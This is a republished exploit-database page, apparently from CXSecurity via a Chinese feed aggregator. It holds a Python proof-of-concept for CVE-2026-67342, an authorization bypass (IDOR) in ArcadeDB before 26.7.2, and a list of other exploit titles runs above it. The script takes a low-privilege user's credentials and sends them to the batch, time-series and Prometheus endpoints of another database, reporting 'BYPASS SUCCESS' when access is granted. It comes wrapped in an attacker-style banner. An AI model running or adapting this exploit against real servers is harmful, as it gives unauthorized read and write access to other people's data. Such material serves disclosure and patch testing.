惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
Visual Studio Blog
罗磊的独立博客
宝玉的分享
宝玉的分享
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
V
V2EX
酷 壳 – CoolShell
酷 壳 – CoolShell
T
Tailwind CSS Blog
博客园_首页
量子位
月光博客
月光博客
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
博客园 - 司徒正美
人人都是产品经理
人人都是产品经理
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
爱范儿
爱范儿
S
SegmentFault 最新的问题
雷峰网
雷峰网
小众软件
小众软件
博客园 - 聂微东
美团技术团队
Apple Machine Learning Research
Apple Machine Learning Research
WordPress大学
WordPress大学
Jina AI
Jina AI
Hugging Face - Blog
Hugging Face - Blog

The Exploit Database - CXSecurity.com

ProFTPD mod_sql post-authentication SQLi RCE Joomla Extension 4.1.4 PHP Object injection LuCI DHCPv6 Lease Hostname Stored Cross-Site Scripting strongSwan 5.9.13 DoS - CXSecurity.com OrkesConductor 3.30.2 Unauthenticated Remote Code Execution Joomla Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE)
ArcadeDB < 26.7.2 Cross-Database Authorization Bypass (IDOR)
Mohammed Idrees Banyamer · 2026-08-02 · via The Exploit Database - CXSecurity.com

ArcadeDB < 26.7.2 Cross-Database Authorization Bypass (IDOR)

#!/usr/bin/env python3 # Exploit Title: ArcadeDB < 26.7.2 Cross-Database Authorization Bypass (IDOR) # CVE: CVE-2026-67342 # Date: 2026-08-02 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://arcadedb.com # Software Link: https://github.com/ArcadeData/arcadedb # Affected: ArcadeDB < 26.7.2 # Tested on: ArcadeDB 26.7.1 # Category: Remote # Platform: Multi # Exploit Type: Authorization Bypass / IDOR # CVSS: 9.3 # CWE : CWE-639 # Description: HTTP handlers for time series, batch, Prometheus and Grafana endpoints fail to validate database access permissions allowing cross-database read/write. # Fixed in: 26.7.2 # Usage: python3 exploit.py <url> <user> <pass> <allowed_db> <target_db> # # Examples: # python3 exploit.py http://127.0.0.1:2480 alice secret db_a db_b # # Options: # # Notes: # Requires valid credentials for any database. Vulnerable endpoints return 200 while protected endpoints correctly return 403. # # How to Use # # Step 1: Provide target URL and credentials of a limited user print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-67342 ║ ║ Target : ArcadeDB < 26.7.2 ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import sys from requests.auth import HTTPBasicAuth def exploit(target, username, password, allowed_db, target_db): base = target.rstrip("/") auth = HTTPBasicAuth(username, password) print(f"[*] Target : {base}") print(f"[*] Authenticated as: {username}") print(f"[*] Allowed DB : {allowed_db}") print(f"[*] Target DB : {target_db}") print("-" * 60) print("[*] Testing protected endpoint (should be 403)...") r = requests.post( f"{base}/api/v1/command/{target_db}", json={"language": "sql", "command": "SELECT FROM V LIMIT 1"}, auth=auth, timeout=10 ) print(f" /api/v1/command/{target_db} → {r.status_code}") endpoints = [ ("POST", f"/api/v1/batch/{target_db}", {"operations": []}), ("POST", f"/api/v1/ts/{target_db}/write", {"metrics": []}), ("POST", f"/api/v1/ts/{target_db}/query", {"query": "SELECT 1"}), ("GET", f"/api/v1/ts/{target_db}/prom/api/v1/query", None), ] print("\n[*] Testing vulnerable handlers...") for method, path, body in endpoints: url = base + path try: if method == "POST": r = requests.post(url, json=body, auth=auth, timeout=10) else: r = requests.get(url, auth=auth, timeout=10) status = r.status_code if status == 200: print(f" [+] {method} {path} → {status} (BYPASS SUCCESS)") else: print(f" [-] {method} {path} → {status}") except Exception as e: print(f" [!] {method} {path} → Error: {e}") print("\n[*] Done.") if __name__ == "__main__": if len(sys.argv) != 6: print("Usage: python3 exploit.py <url> <user> <pass> <allowed_db> <target_db>") print("Example: python3 exploit.py http://127.0.0.1:2480 alice secret db_a db_b") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])

References:

https://github.com/ArcadeData/arcadedb/security/advisories/GHSA-x8mg-6r4p-87pf




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}